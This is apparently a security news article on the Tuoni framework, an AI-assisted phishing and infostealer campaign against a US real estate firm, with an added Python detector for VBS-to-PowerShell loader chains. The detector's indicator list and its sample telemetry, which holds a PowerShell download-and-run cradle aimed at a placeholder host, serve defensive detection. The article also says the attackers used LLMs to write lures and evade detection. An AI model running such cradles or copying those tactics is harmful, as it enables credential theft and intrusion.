Security researchers have identified a previously unknown, AI-enhanced attack framework named Tuoni targeting a major US real estate company. The discovery was made by analysts at Securonix Threat Labs, who observed the framework leveraging large language models (LLMs) to augment its offensive capabilities.
The attack demonstrates the integration of artificial intelligence into malware frameworks to create more sophisticated and evasive threats. The primary goal of the operation appeared to be credential theft and establishing persistent access to the victim’s network.
Dissecting the Tuoni Attack Chain
The initial intrusion vector was a targeted phishing email carrying a malicious Visual Basic Script (VBS) attachment. When the victim executed the script, it launched a PowerShell loader that downloaded and ran additional payloads from a remote server under the attackers' control.
Those payloads included multiple information stealers engineered to harvest credentials and browser cookies, and a remote access trojan (RAT) that gave the attackers persistent control over the compromised system. Because the chain moves from a Windows Script Host process into PowerShell and then out to the network, the parent-child process relationship and the PowerShell command line are the most reliable places to catch it before the stealers run.
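The VBS-to-PowerShell loader chain described above is a classic detection opportunity. The following is an added example, not code from the article or from Securonix, showing how a detection might be written over process-creation telemetry: it flags a Windows Script Host parent (wscript.exe or cscript.exe) spawning PowerShell and scores the PowerShell command line for common download-cradle indicators. The event format (`ParentImage=...|Image=...|CommandLine=...`), the sample events, and the indicator list are constructed for illustration and are not taken from the reported attack.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows Script Host binaries that would execute the VBS attachment stage.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# PowerShell binaries that would host the loader stage.
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line fragments commonly seen in PowerShell download cradles.
# This list is an illustrative assumption, matched case-insensitively.
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"invoke-expression", r"\biex\b", r"-enc(odedcommand)?\b",
    r"frombase64string", r"-w(indowstyle)?\s+hidden", r"-nop\b",
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one 'ParentImage=...|Image=...|CommandLine=...' record.
    Only the first two '|' are treated as separators, so a '|' inside
    the command line is preserved."""
    fields = dict(part.split("=", 1) for part in line.split("|", 2))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def cradle_indicators(ev: ProcEvent) -> List[str]:
    """Cradle patterns present in a PowerShell command line (empty otherwise)."""
    if basename(ev.image) not in POWERSHELL:
        return []
    return [p for p in CRADLE_PATTERNS if re.search(p, ev.command_line, re.I)]


def classify(ev: ProcEvent) -> Optional[str]:
    """Severity for one event, or None when nothing suspicious is seen.
    A script-host parent spawning PowerShell plus cradle indicators is
    the full loader pattern; either half alone is a weaker signal."""
    structural = (basename(ev.parent_image) in SCRIPT_HOSTS
                  and basename(ev.image) in POWERSHELL)
    indicators = cradle_indicators(ev)
    if structural and indicators:
        return "high"
    if structural or len(indicators) >= 2:
        return "medium"
    if indicators:
        return "low"
    return None


def detect(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (event index, severity, matched patterns) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        sev = classify(ev)
        if sev:
            hits.append((i, sev, cradle_indicators(ev)))
    return hits


# Constructed sample telemetry; paths and the URL are placeholders.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    '''|CommandLine=powershell.exe -nop -w hidden -c "IEX (New-Object '''
    '''Net.WebClient).DownloadString('http://example.invalid/stage2')"''',
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\System32\\cscript.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c echo hi",
    "ParentImage=C:\\Windows\\explorer.exe|Image=powershell.exe"
    "|CommandLine=powershell.exe -EncodedCommand SQBFAFgA",
]

if __name__ == "__main__":
    for idx, sev, inds in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {sev} {inds}")
```

The scoring deliberately keeps the structural rule (script host spawning PowerShell) separate from the command-line indicators: a loader that obfuscates its cradle still trips the parent-child check, and a cradle launched from an unexpected parent still gets a low-severity hit rather than being discarded. In a production pipeline the same logic maps directly onto Sysmon Event ID 1 or EDR process-start fields.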
The Role of Artificial Intelligence
The central component of this operation is the Tuoni framework, named after a deity from Finnish mythology. This framework’s defining feature is its use of LLM APIs to generate dynamic, context-aware malicious content. By interfacing with AI models, the attackers can create highly convincing phishing lures tailored to their targets.
This AI integration also allows the framework to dynamically adapt its communication patterns and other tactical elements. This adaptability makes the attack more difficult for traditional, signature-based security tools to detect. The research from Securonix confirmed that the framework was actively using these AI capabilities to enhance the effectiveness of the attack against the real estate firm.
Source: https://www.infosecurity-magazine.com/news/ai-tuoni-framework-targets-us-real/